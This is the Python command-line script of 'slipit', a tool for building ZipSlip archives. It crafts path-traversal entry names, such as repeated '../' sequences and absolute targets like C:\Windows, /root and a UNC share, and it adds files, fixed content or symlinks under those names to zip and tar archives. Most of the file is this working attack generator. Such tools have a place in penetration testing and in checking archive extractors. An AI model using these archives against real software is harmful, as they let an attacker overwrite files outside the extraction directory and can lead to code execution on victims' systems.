#!/usr/bin/env python3

from __future__ import annotations

import sys
import magic
import argparse
import traceback
from pathlib import Path
from slipit import ArchiveProvider


def get_traversals(args, filename: str) -> [str]:
    '''
    Parses the relevant parts from the argparse namespace that are responsible
    for creating the traversal string and creates a list of traversal payloads
    out of them

    Paramaters:
        args        argparse namespace for the command line
        filename    filename within the archive

    Returns:
        None
    '''
    traversal_payloads = []
    sequence = args.sequence.replace('{sep}', args.separator) if args.sequence else f'..{args.separator}'

    if args.prefix and not args.prefix.endswith(args.separator):
        args.prefix += args.separator

    if args.multi:

        traversal_payloads.append(f'C:\\Windows\\{filename}')
        traversal_payloads.append(f'\\\\10.10.10.1\\share\\{filename}')
        traversal_payloads.append(f'/root/{filename}')

        for ctr in range(1, args.depth):
            traversal_payloads.append('../' * ctr + filename)
            traversal_payloads.append('..\\' * ctr + filename)

    elif args.increment is not None:

        for ctr in range(args.increment, args.depth + 1):
            traversal_payloads.append(sequence * ctr + args.prefix + filename)

    else:
        traversal_payloads.append(sequence * args.depth + args.prefix + filename)

    if len(traversal_payloads) < 1:
        print("[-] Traversal payload list is empty. Wrong argument usage.")
        sys.exit(1)

    return traversal_payloads


def check_readable(files: [str]) -> [str]:
    '''
    Takes an array of filenames and checks whether they are readable.
    Returns an array containing the readable files. If no readable files
    are left, an error is thrown and the program exits.

    Parameters:
        files               filenames to check

    Returns:
        None
    '''
    readable = []

    for file in files:

        try:
            with open(file, 'r'):
                readable.append(file)

        except IOError:
            print(f'[!] Unable to open file: {file}')

    if len(readable) == 0:
        print('[-] No files left.')
        sys.exit(1)

    return readable


def get_provider(output_file: str) -> str:
    '''
    Obtain the archive provider that is responsible for the specified output file.
    If the output file exists, it's mime type is used to determine the provider.
    If it does not exist, the file extension is used.

    If no provider can be identified (unknown file extension or unknown mime type)
    an error is printed and the script stops.

    Parameters:
        output_file         path to the output file

    Returns:
        mimetype            mimetype of an existing output file
    '''
    mime = magic.Magic(mime=True)

    try:
        mime_type = mime.from_file(output_file)
        provider = ArchiveProvider.get_provider_mime(mime_type)

        if provider:
            return provider

        print(f'[-] Unsupported archive type: {mime_type}')
        sys.exit(1)

    except FileNotFoundError:

        ext = Path(output_file).suffix
        provider = ArchiveProvider.get_provider_ext(ext)

        if provider:
            return provider

        print(f'[-] Unable to guess mimetype from file extesion: {ext}')
        print('[-] Use the --archive-type option to specify the archive type.')
        sys.exit(1)

    except IsADirectoryError:

        print('[-] Output path is an existing directory.')
        sys.exit(1)


parser = argparse.ArgumentParser(description='''slipit v1.0.1 - Utility for creating ZipSlip archives.''')

parser.add_argument('archive', help='target archive file')
parser.add_argument('filename', nargs='*', help='filenames to include into the archive')
parser.add_argument('--archive-type', dest='type', choices=['zip', 'tar', 'tgz', 'bz2'], help='archive type to use')
parser.add_argument('--clear', action='store_true', help='clear the specified archive from traversal items')
parser.add_argument('--debug', action='store_true', help='enable verbose error output')
parser.add_argument('--depth', metavar='int', type=int, default=6, help='number of traversal sequences to use (default=6)')
parser.add_argument('--increment', metavar='int', type=int, help='add incremental traversal payloads from <int> to depth')
parser.add_argument('--overwrite', action='store_true', help='overwrite the target archive instead of appending to it')
parser.add_argument('--prefix', metavar='string', default='', help='prefix to use before the file name')
parser.add_argument('--multi', action='store_true', help='create an archive containing multiple payloads')
parser.add_argument('--remove', metavar='name', help='remove files from the archive (glob matching)')
parser.add_argument('--separator', metavar='char', default='\\', help='path separator (default=\\)')
parser.add_argument('--sequence', metavar='seq', help='use a custom traversal sequence (default=..{sep})')
parser.add_argument('--static', metavar='content', help='use static content for each input file')
parser.add_argument('--symlink', metavar='target', help='add as symlink (only available for tar archives)')


def main():
    '''
    Main method :)
    '''
    archive = None
    error_code = 0
    args = parser.parse_args()
    provider = ArchiveProvider.get_provider_ext('.' + args.type) if args.type else get_provider(args.archive)

    try:
        if args.clear:
            payload = f'..{args.separator}'
            provider.clear_archive(args.archive, payload)
            return

        if args.remove:
            provider.remove_files(args.archive, args.remove)
            return

        if len(args.filename) < 1:
            provider.list_archive(args.archive)
            return

        if not args.static and not args.symlink:
            check_readable(args.filename)

        archive = provider.create(args.archive) if args.overwrite else provider.open(args.archive)

        for file in args.filename:

            payloads = get_traversals(args, Path(file).name)

            if args.static:
                archive.append_blobs(args.static.encode('utf-8'), payloads)

            elif args.symlink:
                archive.append_symlinks(args.symlink, payloads)

            else:
                archive.append_files(file, payloads)

    except FileNotFoundError as e:
        print(f'[-] Unable to find the specified file: {e}')
        error_code = 1

    except NotImplementedError:
        print('[-] The requested feature is not implemented for the specified archive type.')
        error_code = 2

    except Exception as e:
        print('[-] Unexcepted exception occured.')
        print(f'[-] {e}')

        if args.debug:
            traceback.print_exc()

        error_code = 3

    finally:
        if archive:
            archive.close_archive()

    sys.exit(error_code)


main()
